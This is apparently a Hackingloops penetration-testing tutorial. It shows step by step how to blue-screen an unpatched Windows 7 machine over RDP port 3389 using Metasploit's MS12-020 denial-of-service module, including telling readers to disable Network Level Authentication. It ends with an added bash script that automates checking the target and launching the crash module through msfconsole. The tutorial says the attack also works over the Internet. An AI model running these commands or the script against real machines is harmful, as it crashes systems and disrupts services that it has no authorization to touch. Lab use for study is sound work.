Penetration Testing Windows 7 by Crashing the Machine using the Remote Desktop Connection Vulnerability (MS12-020).
This is a tutorial on penetration testing a Windows 7 machine for the Remote Desktop vulnerability MS12-020 (CVE-2012-0002) using everyone's favourite exploitation framework, Metasploit. Earlier there were plenty of exploits for unpatched XP machines, but modern operating systems such as Windows 7 have far fewer such magical exploits. Most penetration testing tutorials still demonstrate against Windows XP, which is a long-gone OS, so Hackingloops brings you a penetration testing tutorial on a Windows 7 machine.
Generally we see client-side exploits and payloads all the time for Windows 7, and the Social Engineering Toolkit is great for such attacks. However, a Windows 7 machine that has not received the MS12-020 update is still vulnerable through RDP (Remote Desktop Protocol) on TCP port 3389, which is reachable over the LAN and, if the port is forwarded, over the Internet. Over the Internet it is a little more complicated because of the port forwarding; over the LAN the attack is a piece of cake. Note that the module used here is a denial-of-service module: it crashes the target rather than giving you a shell.
All you need for this tutorial is a Kali machine and a victim Windows 7 machine that is missing the MS12-020 patch and has Remote Desktop enabled.
Penetration testing Windows 7 with Kali Linux
Let's begin with the scenario where the victim Windows 7 machine is on the LAN. All we need to get started is the Windows 7 machine's IP address, which you can get with NMAP or with the IPCONFIG command (if you are practicing and have access to the Windows 7 machine).
Start Metasploit : msfconsole
Next we select the module we plan to use, ms12_020_maxchannelids (note the spelling of auxiliary; a typo here gives a "Failed to load module" error).
Command : use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
If you don't know which options this module needs, type "show options" in msfconsole. It lists every option the module takes; the only one you must set here is the target address.
Set the remote host IP address (newer Metasploit releases call this option RHOSTS instead of RHOST; "show options" tells you which name your build uses) :
Command : set RHOST <victim Windows 7 IP>
And you are done!
Just type "exploit" (or "run", the usual verb for auxiliary modules).
If all went right, the target machine gets a blue screen, crashes and reboots. This works over the Internet too, provided TCP port 3389 is forwarded to the target and the target is still missing the MS12-020 update; a patched machine is not affected by the malformed packets.
If the module errors out instead of crashing the target, the most likely cause is that the Windows 7 firewall (or an antivirus with a network filter) is blocking your packets, or that the Kali and Windows 7 machines cannot reach each other at all. A good first diagnostic is to ping the victim from Kali; then confirm that TCP port 3389 is actually open, for example with nmap. Also make sure Remote Desktop is enabled on the Windows 7 machine, otherwise nothing is listening on port 3389.
To enable Remote Desktop on Windows 7 : Go to System (Control Panel\System and Security\System). Click on Remote settings. Under Remote Desktop select "Allow connections from computers running any version of Remote Desktop (less secure)" and click OK. Do not pick the Network Level Authentication option for this lab: with NLA enforced an unauthenticated attacker cannot reach the vulnerable code, which is why Microsoft listed NLA as a mitigation for MS12-020.
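The whole LAN procedure above, plus the reachability checks from the troubleshooting paragraph, as a single script. This is an added example written for this page, not code from the original tutorial or from the Metasploit project. It assumes msfconsole and nc are on PATH (both ship with Kali), that the target IP is passed as the first argument, and that the mode (check or dos) is passed as the second. It also uses Metasploit's auxiliary/scanner/rdp/ms12_020_check module, which tests whether a host is vulnerable without crashing it, so you can confirm the target before running the destructive module; the resource script it writes is what you would otherwise type into msfconsole by hand.

```shell
#!/usr/bin/env bash
# Added example for this tutorial, not part of the original post.
# Wraps the MS12-020 workflow for the LAN scenario:
#   1. validate the target address,
#   2. confirm TCP/3389 is reachable (the troubleshooting step),
#   3. run either the non-destructive ms12_020_check scanner or the
#      ms12_020_maxchannelids DoS module through an msfconsole resource file.
# Assumptions: msfconsole and nc on PATH (Kali); target IP as $1,
# mode (check|dos) as $2.
set -u

# valid_ipv4 ADDR: returns 0 for a dotted-quad IPv4 address, 1 otherwise.
valid_ipv4() {
    case "$1" in
        *.*.*.*.*) return 1 ;;   # four or more dots
        *.*.*.*)   ;;            # exactly three dots
        *)         return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -f; set -- $1; set +f    # split on dots, globbing disabled
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        case "$octet" in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# rdp_reachable ADDR: returns 0 if something answers on TCP/3389.
rdp_reachable() {
    nc -z -w 3 "$1" 3389 >/dev/null 2>&1
}

# make_rc ADDR MODE: prints an msfconsole resource script to stdout.
# "check" uses auxiliary/scanner/rdp/ms12_020_check (no crash);
# "dos" uses the crash module from the tutorial.
make_rc() {
    case "$2" in
        check) module=auxiliary/scanner/rdp/ms12_020_check ;;
        dos)   module=auxiliary/dos/windows/rdp/ms12_020_maxchannelids ;;
        *)     echo "make_rc: mode must be check or dos" >&2; return 1 ;;
    esac
    printf 'use %s\n' "$module"
    # Current Metasploit names the target option RHOSTS; the tutorial's
    # older build used RHOST. "show options" shows which one you have.
    printf 'set RHOSTS %s\n' "$1"
    printf 'run\n'
    printf 'exit -y\n'
}

main() {
    target=$1
    mode=${2:-check}
    if ! valid_ipv4 "$target"; then
        echo "usage: $0 <windows7-ip> [check|dos]" >&2
        return 2
    fi
    if ! rdp_reachable "$target"; then
        echo "tcp/3389 on $target not reachable: check LAN connectivity (ping)," \
             "the Windows firewall, and that Remote Desktop is enabled" >&2
        return 1
    fi
    rc_file=$(mktemp) || return 1
    make_rc "$target" "$mode" > "$rc_file" || { rm -f "$rc_file"; return 1; }
    msfconsole -q -r "$rc_file"
    rm -f "$rc_file"
}

# Only act when a target is given; with no arguments the script just
# defines the functions above.
if [ -n "${1:-}" ]; then
    main "$@"
fi
```

Run it as ./ms12_020.sh 192.168.56.101 check first; only switch to dos once the scanner reports the host vulnerable, because the DoS module blue-screens whatever it hits, and a machine that is patched or has NLA enforced gives you nothing but a reboot of your own lab time.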